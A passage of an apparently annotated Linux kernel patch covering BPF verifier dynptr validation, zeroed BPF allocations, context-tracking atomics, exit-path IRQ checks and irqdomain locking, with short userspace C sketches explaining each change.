+ 		for (i = 0; i < nr_pages; i++) {
+-			struct vm_area_struct *vma = vmas[i];
+-
+-			if (vma_is_shmem(vma))
++			if (vmas[i]->vm_file != file) {
++				ret = -EINVAL;
++				break;
++			}
++			if (!file)
+ 				continue;
+-			if (vma->vm_file &&
+-			    !is_file_hugepages(vma->vm_file)) {
++			if (!vma_is_shmem(vmas[i]) && !is_file_hugepages(file)) {
+ 				ret = -EOPNOTSUPP;
+ 				break;
+ 			}
+diff --git a/kernel/bpf/btf.c b/kernel/bpf/btf.c
+index b7017cae6fd1e..530e200fbc477 100644
+--- a/kernel/bpf/btf.c
++++ b/kernel/bpf/btf.c
+@@ -5573,6 +5573,7 @@ btf_get_prog_ctx_type(struct bpf_verifier_log *log, const struct btf *btf,
+ 	if (!ctx_struct)
+ 		/* should not happen */
+ 		return NULL;
++again:
+ 	ctx_tname = btf_name_by_offset(btf_vmlinux, ctx_struct->name_off);
+ 	if (!ctx_tname) {
+ 		/* should not happen */
+@@ -5586,8 +5587,16 @@ btf_get_prog_ctx_type(struct bpf_verifier_log *log, const struct btf *btf,
+ 	 * int socket_filter_bpf_prog(struct __sk_buff *skb)
+ 	 * { // no fields of skb are ever used }
+ 	 */
+-	if (strcmp(ctx_tname, tname))
+-		return NULL;
++	if (strcmp(ctx_tname, tname)) {
++		/* bpf_user_pt_regs_t is a typedef, so resolve it to
++		 * underlying struct and check name again
++		 */
++		if (!btf_type_is_modifier(ctx_struct))
++			return NULL;
++		while (btf_type_is_modifier(ctx_struct))
++			ctx_struct = btf_type_by_id(btf_vmlinux, ctx_struct->type);
++		goto again;
++	}
+ 	return ctx_type;
+ }
+ 
+diff --git a/kernel/bpf/hashtab.c b/kernel/bpf/hashtab.c
+index 66bded1443773..5dfcb5ad0d068 100644
+--- a/kernel/bpf/hashtab.c
++++ b/kernel/bpf/hashtab.c
+@@ -1004,8 +1004,6 @@ static struct htab_elem *alloc_htab_elem(struct bpf_htab *htab, void *key,
+ 			l_new = ERR_PTR(-ENOMEM);
+ 			goto dec_count;
+ 		}
+-		check_and_init_map_value(&htab->map,
+-					 l_new->key + round_up(key_size, 8));
+ 	}
+ 
+ 	memcpy(l_new->key, key, key_size);
+@@ -1592,6 +1590,7 @@ static int __htab_map_lookup_and_delete_elem(struct bpf_map *map, void *key,
+ 			else
+ 				copy_map_value(map, value, l->key +
+ 					       roundup_key_size);
++			/* Zeroing special fields in the temp buffer */
+ 			check_and_init_map_value(map, value);
+ 		}
+ 
+@@ -1792,6 +1791,7 @@ again_nocopy:
+ 						      true);
+ 			else
+ 				copy_map_value(map, dst_val, value);
++			/* Zeroing special fields in the temp buffer */
+ 			check_and_init_map_value(map, dst_val);
+ 		}
+ 		if (do_delete) {
+diff --git a/kernel/bpf/memalloc.c b/kernel/bpf/memalloc.c
+index 1db156405b68b..7b784823a52ef 100644
+--- a/kernel/bpf/memalloc.c
++++ b/kernel/bpf/memalloc.c
+@@ -143,7 +143,7 @@ static void *__alloc(struct bpf_mem_cache *c, int node)
+ 		return obj;
+ 	}
+ 
+-	return kmalloc_node(c->unit_size, flags, node);
++	return kmalloc_node(c->unit_size, flags | __GFP_ZERO, node);
+ }
+ 
+ static struct mem_cgroup *get_memcg(const struct bpf_mem_cache *c)
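
The one-line fix makes the kmalloc_node() fallback return zeroed memory, matching
what callers already assumed from the cache path. The userspace analogue is the
malloc()/calloc() distinction:

#include <stdio.h>
#include <stdlib.h>

int main(void)
{
	int *a = malloc(4 * sizeof(*a));	/* contents indeterminate */
	int *b = calloc(4, sizeof(*b));		/* guaranteed zeroed */

	if (!a || !b)
		return 1;
	printf("calloc'd first element: %d\n", b[0]);
	free(a);
	free(b);
	return 0;
}
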
+diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
+index 7ee2188272597..68455fd56eea5 100644
+--- a/kernel/bpf/verifier.c
++++ b/kernel/bpf/verifier.c
+@@ -638,11 +638,34 @@ static void print_liveness(struct bpf_verifier_env *env,
+ 		verbose(env, "D");
+ }
+ 
+-static int get_spi(s32 off)
++static int __get_spi(s32 off)
+ {
+ 	return (-off - 1) / BPF_REG_SIZE;
+ }
+ 
++static int dynptr_get_spi(struct bpf_verifier_env *env, struct bpf_reg_state *reg)
++{
++	int off, spi;
++
++	if (!tnum_is_const(reg->var_off)) {
++		verbose(env, "dynptr has to be at a constant offset\n");
++		return -EINVAL;
++	}
++
++	off = reg->off + reg->var_off.value;
++	if (off % BPF_REG_SIZE) {
++		verbose(env, "cannot pass in dynptr at an offset=%d\n", off);
++		return -EINVAL;
++	}
++
++	spi = __get_spi(off);
++	if (spi < 1) {
++		verbose(env, "cannot pass in dynptr at an offset=%d\n", off);
++		return -EINVAL;
++	}
++	return spi;
++}
++
+ static bool is_spi_bounds_valid(struct bpf_func_state *state, int spi, int nr_slots)
+ {
+ 	int allocated_slots = state->allocated_stack / BPF_REG_SIZE;
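
dynptr_get_spi() layers validation on the same arithmetic as __get_spi(): offsets
below the frame are negative and must be 8-byte aligned, and a dynptr needs
spi >= 1 because it spans two consecutive slots. The index math on its own:

#include <stdio.h>

#define BPF_REG_SIZE 8

static int get_spi(int off)
{
	return (-off - 1) / BPF_REG_SIZE;
}

int main(void)
{
	/* off -8 is slot 0; off -16 is slot 1. A dynptr needs spi >= 1
	 * since it occupies slots spi and spi - 1. */
	printf("off=-8  -> spi %d\n", get_spi(-8));
	printf("off=-16 -> spi %d\n", get_spi(-16));
	return 0;
}
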
+@@ -746,6 +769,8 @@ static void mark_dynptr_cb_reg(struct bpf_reg_state *reg,
+ 	__mark_dynptr_reg(reg, type, true);
+ }
+ 
++static int destroy_if_dynptr_stack_slot(struct bpf_verifier_env *env,
++				        struct bpf_func_state *state, int spi);
+ 
+ static int mark_stack_slots_dynptr(struct bpf_verifier_env *env, struct bpf_reg_state *reg,
+ 				   enum bpf_arg_type arg_type, int insn_idx)
+@@ -754,7 +779,9 @@ static int mark_stack_slots_dynptr(struct bpf_verifier_env *env, struct bpf_reg_
+ 	enum bpf_dynptr_type type;
+ 	int spi, i, id;
+ 
+-	spi = get_spi(reg->off);
++	spi = dynptr_get_spi(env, reg);
++	if (spi < 0)
++		return spi;
+ 
+ 	if (!is_spi_bounds_valid(state, spi, BPF_DYNPTR_NR_SLOTS))
+ 		return -EINVAL;
+@@ -781,6 +808,9 @@ static int mark_stack_slots_dynptr(struct bpf_verifier_env *env, struct bpf_reg_
+ 		state->stack[spi - 1].spilled_ptr.ref_obj_id = id;
+ 	}
+ 
++	state->stack[spi].spilled_ptr.live |= REG_LIVE_WRITTEN;
++	state->stack[spi - 1].spilled_ptr.live |= REG_LIVE_WRITTEN;
++
+ 	return 0;
+ }
+ 
+@@ -789,7 +819,9 @@ static int unmark_stack_slots_dynptr(struct bpf_verifier_env *env, struct bpf_re
+ 	struct bpf_func_state *state = func(env, reg);
+ 	int spi, i;
+ 
+-	spi = get_spi(reg->off);
++	spi = dynptr_get_spi(env, reg);
++	if (spi < 0)
++		return spi;
+ 
+ 	if (!is_spi_bounds_valid(state, spi, BPF_DYNPTR_NR_SLOTS))
+ 		return -EINVAL;
+@@ -805,6 +837,80 @@ static int unmark_stack_slots_dynptr(struct bpf_verifier_env *env, struct bpf_re
+ 
+ 	__mark_reg_not_init(env, &state->stack[spi].spilled_ptr);
+ 	__mark_reg_not_init(env, &state->stack[spi - 1].spilled_ptr);
++
++	/* Why do we need to set REG_LIVE_WRITTEN for STACK_INVALID slot?
++	 *
++	 * While we don't allow reading STACK_INVALID, it is still possible to
++	 * do <8 byte writes marking some but not all slots as STACK_MISC. Then,
++	 * helpers or insns can do partial read of that part without failing,
++	 * but check_stack_range_initialized, check_stack_read_var_off, and
++	 * check_stack_read_fixed_off will do mark_reg_read for all 8-bytes of
++	 * the slot conservatively. Hence we need to prevent those liveness
++	 * marking walks.
++	 *
++	 * This was not a problem before because STACK_INVALID is only set by
++	 * default (where the default reg state has its reg->parent as NULL), or
++	 * in clean_live_states after REG_LIVE_DONE (at which point
++	 * mark_reg_read won't walk reg->parent chain), but not randomly during
++	 * verifier state exploration (like we did above). Hence, for our case
++	 * parentage chain will still be live (i.e. reg->parent may be
++	 * non-NULL), while earlier reg->parent was NULL, so we need
++	 * REG_LIVE_WRITTEN to screen off read marker propagation when it is
++	 * done later on reads or by mark_dynptr_read, so that registers in
++	 * the verifier state are not marked unnecessarily.
++	 */
++	state->stack[spi].spilled_ptr.live |= REG_LIVE_WRITTEN;
++	state->stack[spi - 1].spilled_ptr.live |= REG_LIVE_WRITTEN;
++
++	return 0;
++}
++
++static void __mark_reg_unknown(const struct bpf_verifier_env *env,
++			       struct bpf_reg_state *reg);
++
++static int destroy_if_dynptr_stack_slot(struct bpf_verifier_env *env,
++				        struct bpf_func_state *state, int spi)
++{
++	int i;
++
++	/* We always ensure that STACK_DYNPTR is never set partially,
++	 * hence just checking for slot_type[0] is enough. This is
++	 * different for STACK_SPILL, where it may be set for only
++	 * 1 byte, so the code has to use is_spilled_reg.
++	 */
++	if (state->stack[spi].slot_type[0] != STACK_DYNPTR)
++		return 0;
++
++	/* Reposition spi to first slot */
++	if (!state->stack[spi].spilled_ptr.dynptr.first_slot)
++		spi = spi + 1;
++
++	if (dynptr_type_refcounted(state->stack[spi].spilled_ptr.dynptr.type)) {
++		verbose(env, "cannot overwrite referenced dynptr\n");
++		return -EINVAL;
++	}
++
++	mark_stack_slot_scratched(env, spi);
++	mark_stack_slot_scratched(env, spi - 1);
++
++	/* Writing partially to one dynptr stack slot destroys both. */
++	for (i = 0; i < BPF_REG_SIZE; i++) {
++		state->stack[spi].slot_type[i] = STACK_INVALID;
++		state->stack[spi - 1].slot_type[i] = STACK_INVALID;
++	}
++
++	/* TODO: Invalidate any slices associated with this dynptr */
++
++	/* Do not release reference state, we are destroying dynptr on stack,
++	 * not using some helper to release it. Just reset register.
++	 */
++	__mark_reg_not_init(env, &state->stack[spi].spilled_ptr);
++	__mark_reg_not_init(env, &state->stack[spi - 1].spilled_ptr);
++
++	/* Same reason as unmark_stack_slots_dynptr above */
++	state->stack[spi].spilled_ptr.live |= REG_LIVE_WRITTEN;
++	state->stack[spi - 1].spilled_ptr.live |= REG_LIVE_WRITTEN;
++
+ 	return 0;
+ }
+ 
+@@ -816,7 +922,11 @@ static bool is_dynptr_reg_valid_uninit(struct bpf_verifier_env *env, struct bpf_
+ 	if (reg->type == CONST_PTR_TO_DYNPTR)
+ 		return false;
+ 
+-	spi = get_spi(reg->off);
++	spi = dynptr_get_spi(env, reg);
++	if (spi < 0)
++		return false;
++
++	/* We will do check_mem_access to check and update stack bounds later */
+ 	if (!is_spi_bounds_valid(state, spi, BPF_DYNPTR_NR_SLOTS))
+ 		return true;
+ 
+@@ -832,14 +942,15 @@ static bool is_dynptr_reg_valid_uninit(struct bpf_verifier_env *env, struct bpf_
+ static bool is_dynptr_reg_valid_init(struct bpf_verifier_env *env, struct bpf_reg_state *reg)
+ {
+ 	struct bpf_func_state *state = func(env, reg);
+-	int spi;
+-	int i;
++	int spi, i;
+ 
+ 	/* This already represents first slot of initialized bpf_dynptr */
+ 	if (reg->type == CONST_PTR_TO_DYNPTR)
+ 		return true;
+ 
+-	spi = get_spi(reg->off);
++	spi = dynptr_get_spi(env, reg);
++	if (spi < 0)
++		return false;
+ 	if (!is_spi_bounds_valid(state, spi, BPF_DYNPTR_NR_SLOTS) ||
+ 	    !state->stack[spi].spilled_ptr.dynptr.first_slot)
+ 		return false;
+@@ -868,7 +979,9 @@ static bool is_dynptr_type_expected(struct bpf_verifier_env *env, struct bpf_reg
+ 	if (reg->type == CONST_PTR_TO_DYNPTR) {
+ 		return reg->dynptr.type == dynptr_type;
+ 	} else {
+-		spi = get_spi(reg->off);
++		spi = dynptr_get_spi(env, reg);
++		if (spi < 0)
++			return false;
+ 		return state->stack[spi].spilled_ptr.dynptr.type == dynptr_type;
+ 	}
+ }
+@@ -2386,6 +2499,32 @@ static int mark_reg_read(struct bpf_verifier_env *env,
+ 	return 0;
+ }
+ 
++static int mark_dynptr_read(struct bpf_verifier_env *env, struct bpf_reg_state *reg)
++{
++	struct bpf_func_state *state = func(env, reg);
++	int spi, ret;
++
++	/* For CONST_PTR_TO_DYNPTR, it must have already been done by
++	 * check_reg_arg in check_helper_call and mark_btf_func_reg_size in
++	 * check_kfunc_call.
++	 */
++	if (reg->type == CONST_PTR_TO_DYNPTR)
++		return 0;
++	spi = dynptr_get_spi(env, reg);
++	if (spi < 0)
++		return spi;
++	/* Caller ensures dynptr is valid and initialized, which means spi is in
++	 * bounds and spi is the first dynptr slot. Simply mark stack slot as
++	 * read.
++	 */
++	ret = mark_reg_read(env, &state->stack[spi].spilled_ptr,
++			    state->stack[spi].spilled_ptr.parent, REG_LIVE_READ64);
++	if (ret)
++		return ret;
++	return mark_reg_read(env, &state->stack[spi - 1].spilled_ptr,
++			     state->stack[spi - 1].spilled_ptr.parent, REG_LIVE_READ64);
++}
++
+ /* This function is supposed to be used by the following 32-bit optimization
+  * code only. It returns TRUE if the source or destination register operates
+  * on 64-bit, otherwise return FALSE.
+@@ -3318,6 +3457,10 @@ static int check_stack_write_fixed_off(struct bpf_verifier_env *env,
+ 			env->insn_aux_data[insn_idx].sanitize_stack_spill = true;
+ 	}
+ 
++	err = destroy_if_dynptr_stack_slot(env, state, spi);
++	if (err)
++		return err;
++
+ 	mark_stack_slot_scratched(env, spi);
+ 	if (reg && !(off % BPF_REG_SIZE) && register_is_bounded(reg) &&
+ 	    !register_is_null(reg) && env->bpf_capable) {
+@@ -3431,6 +3574,14 @@ static int check_stack_write_var_off(struct bpf_verifier_env *env,
+ 	if (err)
+ 		return err;
+ 
++	for (i = min_off; i < max_off; i++) {
++		int spi;
++
++		spi = __get_spi(i);
++		err = destroy_if_dynptr_stack_slot(env, state, spi);
++		if (err)
++			return err;
++	}
+ 
+ 	/* Variable offset writes destroy any spilled pointers in range. */
+ 	for (i = min_off; i < max_off; i++) {
+@@ -5458,6 +5609,31 @@ static int check_stack_range_initialized(
+ 	}
+ 
+ 	if (meta && meta->raw_mode) {
++		/* Ensure we won't be overwriting dynptrs when simulating byte
++		 * by byte access in check_helper_call using meta.access_size.
++		 * This would be a problem if we have a helper in the future
++		 * which takes:
++		 *
++		 *	helper(uninit_mem, len, dynptr)
++		 *
++		 * Now, uninit_mem may overlap with the dynptr pointer. Hence, it
++		 * may end up writing to the dynptr itself when touching memory from
++		 * arg 1. This can be relaxed on a case by case basis for known
++		 * safe cases, but reject by default due to the possibility of
++		 * aliasing.
++		 */
++		for (i = min_off; i < max_off + access_size; i++) {
++			int stack_off = -i - 1;
++
++			spi = __get_spi(i);
++			/* raw_mode may write past allocated_stack */
++			if (state->allocated_stack <= stack_off)
++				continue;
++			if (state->stack[spi].slot_type[stack_off % BPF_REG_SIZE] == STACK_DYNPTR) {
++				verbose(env, "potential write to dynptr at off=%d disallowed\n", i);
++				return -EACCES;
++			}
++		}
+ 		meta->access_size = access_size;
+ 		meta->regno = regno;
+ 		return 0;
+@@ -5955,12 +6131,15 @@ int process_dynptr_func(struct bpf_verifier_env *env, int regno,
+ 	}
+ 	/* CONST_PTR_TO_DYNPTR already has fixed and var_off as 0 due to
+ 	 * check_func_arg_reg_off's logic. We only need to check offset
+-	 * alignment for PTR_TO_STACK.
++	 * and its alignment for PTR_TO_STACK.
+ 	 */
+-	if (reg->type == PTR_TO_STACK && (reg->off % BPF_REG_SIZE)) {
+-		verbose(env, "cannot pass in dynptr at an offset=%d\n", reg->off);
+-		return -EINVAL;
++	if (reg->type == PTR_TO_STACK) {
++		int err = dynptr_get_spi(env, reg);
++
++		if (err < 0)
++			return err;
+ 	}
++
+ 	/*  MEM_UNINIT - Points to memory that is an appropriate candidate for
+ 	 *		 constructing a mutable bpf_dynptr object.
+ 	 *
+@@ -5992,6 +6171,8 @@ int process_dynptr_func(struct bpf_verifier_env *env, int regno,
+ 
+ 		meta->uninit_dynptr_regno = regno;
+ 	} else /* MEM_RDONLY and None case from above */ {
++		int err;
++
+ 		/* For the reg->type == PTR_TO_STACK case, bpf_dynptr is never const */
+ 		if (reg->type == CONST_PTR_TO_DYNPTR && !(arg_type & MEM_RDONLY)) {
+ 			verbose(env, "cannot pass pointer to const bpf_dynptr, the helper mutates it\n");
+@@ -6025,6 +6206,10 @@ int process_dynptr_func(struct bpf_verifier_env *env, int regno,
+ 				err_extra, regno);
+ 			return -EINVAL;
+ 		}
++
++		err = mark_dynptr_read(env, reg);
++		if (err)
++			return err;
+ 	}
+ 	return 0;
+ }
+@@ -6362,15 +6547,16 @@ int check_func_arg_reg_off(struct bpf_verifier_env *env,
+ 	}
+ }
+ 
+-static u32 dynptr_ref_obj_id(struct bpf_verifier_env *env, struct bpf_reg_state *reg)
++static int dynptr_ref_obj_id(struct bpf_verifier_env *env, struct bpf_reg_state *reg)
+ {
+ 	struct bpf_func_state *state = func(env, reg);
+ 	int spi;
+ 
+ 	if (reg->type == CONST_PTR_TO_DYNPTR)
+ 		return reg->ref_obj_id;
+-
+-	spi = get_spi(reg->off);
++	spi = dynptr_get_spi(env, reg);
++	if (spi < 0)
++		return spi;
+ 	return state->stack[spi].spilled_ptr.ref_obj_id;
+ }
+ 
+@@ -6444,7 +6630,9 @@ skip_type_check:
+ 			 * PTR_TO_STACK.
+ 			 */
+ 			if (reg->type == PTR_TO_STACK) {
+-				spi = get_spi(reg->off);
++				spi = dynptr_get_spi(env, reg);
++				if (spi < 0)
++					return spi;
+ 				if (!is_spi_bounds_valid(state, spi, BPF_DYNPTR_NR_SLOTS) ||
+ 				    !state->stack[spi].spilled_ptr.ref_obj_id) {
+ 					verbose(env, "arg %d is an unacquired reference\n", regno);
+@@ -7933,13 +8121,19 @@ static int check_helper_call(struct bpf_verifier_env *env, struct bpf_insn *insn
+ 		for (i = 0; i < MAX_BPF_FUNC_REG_ARGS; i++) {
+ 			if (arg_type_is_dynptr(fn->arg_type[i])) {
+ 				struct bpf_reg_state *reg = &regs[BPF_REG_1 + i];
++				int ref_obj_id;
+ 
+ 				if (meta.ref_obj_id) {
+ 					verbose(env, "verifier internal error: meta.ref_obj_id already set\n");
+ 					return -EFAULT;
+ 				}
+ 
+-				meta.ref_obj_id = dynptr_ref_obj_id(env, reg);
++				ref_obj_id = dynptr_ref_obj_id(env, reg);
++				if (ref_obj_id < 0) {
++					verbose(env, "verifier internal error: failed to obtain dynptr ref_obj_id\n");
++					return ref_obj_id;
++				}
++				meta.ref_obj_id = ref_obj_id;
+ 				break;
+ 			}
+ 		}
+@@ -13231,10 +13425,9 @@ static bool stacksafe(struct bpf_verifier_env *env, struct bpf_func_state *old,
+ 			return false;
+ 		if (i % BPF_REG_SIZE != BPF_REG_SIZE - 1)
+ 			continue;
+-		if (!is_spilled_reg(&old->stack[spi]))
+-			continue;
+-		if (!regsafe(env, &old->stack[spi].spilled_ptr,
+-			     &cur->stack[spi].spilled_ptr, idmap))
++		/* Both old and cur have the same slot_type */
++		switch (old->stack[spi].slot_type[BPF_REG_SIZE - 1]) {
++		case STACK_SPILL:
+ 			/* when explored and current stack slot are both storing
+ 			 * spilled registers, check that stored pointers types
+ 			 * are the same as well.
+@@ -13245,7 +13438,30 @@ static bool stacksafe(struct bpf_verifier_env *env, struct bpf_func_state *old,
+ 			 * such verifier states are not equivalent.
+ 			 * return false to continue verification of this path
+ 			 */
++			if (!regsafe(env, &old->stack[spi].spilled_ptr,
++				     &cur->stack[spi].spilled_ptr, idmap))
++				return false;
++			break;
++		case STACK_DYNPTR:
++		{
++			const struct bpf_reg_state *old_reg, *cur_reg;
++
++			old_reg = &old->stack[spi].spilled_ptr;
++			cur_reg = &cur->stack[spi].spilled_ptr;
++			if (old_reg->dynptr.type != cur_reg->dynptr.type ||
++			    old_reg->dynptr.first_slot != cur_reg->dynptr.first_slot ||
++			    !check_ids(old_reg->ref_obj_id, cur_reg->ref_obj_id, idmap))
++				return false;
++			break;
++		}
++		case STACK_MISC:
++		case STACK_ZERO:
++		case STACK_INVALID:
++			continue;
++		/* Ensure that new unhandled slot types return false by default */
++		default:
+ 			return false;
++		}
+ 	}
+ 	return true;
+ }
+diff --git a/kernel/context_tracking.c b/kernel/context_tracking.c
+index 77978e3723771..a09f1c19336ae 100644
+--- a/kernel/context_tracking.c
++++ b/kernel/context_tracking.c
+@@ -510,7 +510,7 @@ void noinstr __ct_user_enter(enum ctx_state state)
+ 			 * In this case we don't care about any concurrency/ordering.
+ 			 */
+ 			if (!IS_ENABLED(CONFIG_CONTEXT_TRACKING_IDLE))
+-				atomic_set(&ct->state, state);
++				arch_atomic_set(&ct->state, state);
+ 		} else {
+ 			/*
+ 			 * Even if context tracking is disabled on this CPU, because it's outside
+@@ -527,7 +527,7 @@ void noinstr __ct_user_enter(enum ctx_state state)
+ 			 */
+ 			if (!IS_ENABLED(CONFIG_CONTEXT_TRACKING_IDLE)) {
+ 				/* Tracking for vtime only, no concurrent RCU EQS accounting */
+-				atomic_set(&ct->state, state);
++				arch_atomic_set(&ct->state, state);
+ 			} else {
+ 				/*
+ 				 * Tracking for vtime and RCU EQS. Make sure we don't race
+@@ -535,7 +535,7 @@ void noinstr __ct_user_enter(enum ctx_state state)
+ 				 * RCU only requires RCU_DYNTICKS_IDX increments to be fully
+ 				 * ordered.
+ 				 */
+-				atomic_add(state, &ct->state);
++				arch_atomic_add(state, &ct->state);
+ 			}
+ 		}
+ 	}
+@@ -630,12 +630,12 @@ void noinstr __ct_user_exit(enum ctx_state state)
+ 			 * In this case we don't care about any concurrency/ordering.
+ 			 */
+ 			if (!IS_ENABLED(CONFIG_CONTEXT_TRACKING_IDLE))
+-				atomic_set(&ct->state, CONTEXT_KERNEL);
++				arch_atomic_set(&ct->state, CONTEXT_KERNEL);
+ 
+ 		} else {
+ 			if (!IS_ENABLED(CONFIG_CONTEXT_TRACKING_IDLE)) {
+ 				/* Tracking for vtime only, no concurrent RCU EQS accounting */
+-				atomic_set(&ct->state, CONTEXT_KERNEL);
++				arch_atomic_set(&ct->state, CONTEXT_KERNEL);
+ 			} else {
+ 				/*
+ 				 * Tracking for vtime and RCU EQS. Make sure we don't race
+@@ -643,7 +643,7 @@ void noinstr __ct_user_exit(enum ctx_state state)
+ 				 * RCU only requires RCU_DYNTICKS_IDX increments to be fully
+ 				 * ordered.
+ 				 */
+-				atomic_sub(state, &ct->state);
++				arch_atomic_sub(state, &ct->state);
+ 			}
+ 		}
+ 	}
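
atomic_set() and friends are instrumented wrappers (KASAN/KCSAN hooks) around the
raw arch_atomic_*() operations; noinstr code such as __ct_user_enter() must use the
raw form so no instrumented call is emitted where instrumentation is forbidden. The
wrapper/raw split, sketched with a compiler builtin and an illustrative trace hook:

#include <stdio.h>

static int state;

static void arch_state_set(int v)	/* raw op: safe in noinstr code */
{
	__atomic_store_n(&state, v, __ATOMIC_RELAXED);
}

static void state_set(int v)		/* instrumented wrapper */
{
	printf("trace: state <- %d\n", v);	/* would recurse in noinstr */
	arch_state_set(v);
}

int main(void)
{
	state_set(1);
	arch_state_set(2);
	printf("state = %d\n", state);
	return 0;
}
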
+diff --git a/kernel/exit.c b/kernel/exit.c
+index 15dc2ec80c467..f2afdb0add7c5 100644
+--- a/kernel/exit.c
++++ b/kernel/exit.c
+@@ -807,6 +807,8 @@ void __noreturn do_exit(long code)
+ 	struct task_struct *tsk = current;
+ 	int group_dead;
+ 
++	WARN_ON(irqs_disabled());
++
+ 	synchronize_group_exit(tsk, code);
+ 
+ 	WARN_ON(tsk->plug);
+@@ -938,6 +940,11 @@ void __noreturn make_task_dead(int signr)
+ 	if (unlikely(!tsk->pid))
+ 		panic("Attempted to kill the idle task!");
+ 
++	if (unlikely(irqs_disabled())) {
++		pr_info("note: %s[%d] exited with irqs disabled\n",
++			current->comm, task_pid_nr(current));
++		local_irq_enable();
++	}
+ 	if (unlikely(in_atomic())) {
+ 		pr_info("note: %s[%d] exited with preempt_count %d\n",
+ 			current->comm, task_pid_nr(current),
+@@ -1898,7 +1905,14 @@ bool thread_group_exited(struct pid *pid)
+ }
+ EXPORT_SYMBOL(thread_group_exited);
+ 
+-__weak void abort(void)
++/*
++ * This needs to be __function_aligned as GCC implicitly makes any
++ * implementation of abort() cold and drops alignment specified by
++ * -falign-functions=N.
++ *
++ * See https://gcc.gnu.org/bugzilla/show_bug.cgi?id=88345#c11
++ */
++__weak __function_aligned void abort(void)
+ {
+ 	BUG();
+ 
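
GCC treats any definition of abort() as implicitly cold, and cold functions lose
-falign-functions alignment, which breaks configurations that rely on function
alignment; restating the alignment on the definition sidesteps that. A sketch where
64 is an arbitrary example value:

#include <stdint.h>
#include <stdio.h>

__attribute__((aligned(64), noinline)) static void cold_path(void)
{
	/* would call BUG()/panic in the kernel */
}

int main(void)
{
	uintptr_t addr = (uintptr_t)cold_path;

	printf("cold_path at %#lx, 64-byte aligned: %s\n",
	       (unsigned long)addr, addr % 64 ? "no" : "yes");
	return 0;
}
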
+diff --git a/kernel/irq/irqdomain.c b/kernel/irq/irqdomain.c
+index 798a9042421fc..8e14805c55083 100644
+--- a/kernel/irq/irqdomain.c
++++ b/kernel/irq/irqdomain.c
+@@ -25,6 +25,9 @@ static DEFINE_MUTEX(irq_domain_mutex);
+ 
+ static struct irq_domain *irq_default_domain;
+ 
++static int irq_domain_alloc_irqs_locked(struct irq_domain *domain, int irq_base,
++					unsigned int nr_irqs, int node, void *arg,
++					bool realloc, const struct irq_affinity_desc *affinity);
+ static void irq_domain_check_hierarchy(struct irq_domain *domain);
+ 
+ struct irqchip_fwid {
+@@ -123,23 +126,12 @@ void irq_domain_free_fwnode(struct fwnode_handle *fwnode)
+ }
+ EXPORT_SYMBOL_GPL(irq_domain_free_fwnode);
+ 
+-/**
+- * __irq_domain_add() - Allocate a new irq_domain data structure
+- * @fwnode: firmware node for the interrupt controller
+- * @size: Size of linear map; 0 for radix mapping only
+- * @hwirq_max: Maximum number of interrupts supported by controller
+- * @direct_max: Maximum value of direct maps; Use ~0 for no limit; 0 for no
+- *              direct mapping
+- * @ops: domain callbacks
+- * @host_data: Controller private data pointer
+- *
+- * Allocates and initializes an irq_domain structure.
+- * Returns pointer to IRQ domain, or NULL on failure.
+- */
+-struct irq_domain *__irq_domain_add(struct fwnode_handle *fwnode, unsigned int size,
+-				    irq_hw_number_t hwirq_max, int direct_max,
+-				    const struct irq_domain_ops *ops,
+-				    void *host_data)
++static struct irq_domain *__irq_domain_create(struct fwnode_handle *fwnode,
++					      unsigned int size,
++					      irq_hw_number_t hwirq_max,
++					      int direct_max,
++					      const struct irq_domain_ops *ops,
++					      void *host_data)
+ {
+ 	struct irqchip_fwid *fwid;
+ 	struct irq_domain *domain;
+@@ -227,12 +219,44 @@ struct irq_domain *__irq_domain_add(struct fwnode_handle *fwnode, unsigned int s
+ 
+ 	irq_domain_check_hierarchy(domain);
+ 
++	return domain;
++}
++
++static void __irq_domain_publish(struct irq_domain *domain)
++{
+ 	mutex_lock(&irq_domain_mutex);
+ 	debugfs_add_domain_dir(domain);
+ 	list_add(&domain->link, &irq_domain_list);
+ 	mutex_unlock(&irq_domain_mutex);
+ 
+ 	pr_debug("Added domain %s\n", domain->name);
++}
++
++/**
++ * __irq_domain_add() - Allocate a new irq_domain data structure
++ * @fwnode: firmware node for the interrupt controller
++ * @size: Size of linear map; 0 for radix mapping only
++ * @hwirq_max: Maximum number of interrupts supported by controller
++ * @direct_max: Maximum value of direct maps; Use ~0 for no limit; 0 for no
++ *              direct mapping
++ * @ops: domain callbacks
++ * @host_data: Controller private data pointer
++ *
++ * Allocates and initializes an irq_domain structure.
++ * Returns pointer to IRQ domain, or NULL on failure.
++ */
++struct irq_domain *__irq_domain_add(struct fwnode_handle *fwnode, unsigned int size,
++				    irq_hw_number_t hwirq_max, int direct_max,
++				    const struct irq_domain_ops *ops,
++				    void *host_data)
++{
++	struct irq_domain *domain;
++
++	domain = __irq_domain_create(fwnode, size, hwirq_max, direct_max,
++				     ops, host_data);
++	if (domain)
++		__irq_domain_publish(domain);
++
+ 	return domain;
+ }
+ EXPORT_SYMBOL_GPL(__irq_domain_add);
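
__irq_domain_create()/__irq_domain_publish() split construction from global
visibility: irq_domain_create_hierarchy() can now set parent and flags on a domain
that no lookup can yet observe, and only then add it to irq_domain_list. The
two-phase shape in a userspace sketch, with a toy registry standing in:

#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>

struct domain_sketch {
	const char *name;
	unsigned int flags;
	struct domain_sketch *next;
};

static pthread_mutex_t registry_lock = PTHREAD_MUTEX_INITIALIZER;
static struct domain_sketch *registry;

/* Step 1: allocate and initialize; nothing globally visible yet. */
static struct domain_sketch *domain_create(const char *name)
{
	struct domain_sketch *d = calloc(1, sizeof(*d));

	if (d)
		d->name = name;
	return d;
}

/* Step 2: publish the fully formed object under the lock. */
static void domain_publish(struct domain_sketch *d)
{
	pthread_mutex_lock(&registry_lock);
	d->next = registry;
	registry = d;
	pthread_mutex_unlock(&registry_lock);
}

int main(void)
{
	struct domain_sketch *d = domain_create("example");

	if (!d)
		return 1;
	d->flags |= 0x1;	/* hierarchy setup happens between steps */
	domain_publish(d);
	printf("published: %s\n", registry->name);
	return 0;
}
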
+@@ -538,6 +562,9 @@ static void irq_domain_disassociate(struct irq_domain *domain, unsigned int irq)
+ 		return;
+ 
+ 	hwirq = irq_data->hwirq;
++
++	mutex_lock(&irq_domain_mutex);
++
+ 	irq_set_status_flags(irq, IRQ_NOREQUEST);
+ 
+ 	/* remove chip and handler */
+@@ -557,10 +584,12 @@ static void irq_domain_disassociate(struct irq_domain *domain, unsigned int irq)
+ 
+ 	/* Clear reverse map for this hwirq */
+ 	irq_domain_clear_mapping(domain, hwirq);
++
++	mutex_unlock(&irq_domain_mutex);
+ }
+ 
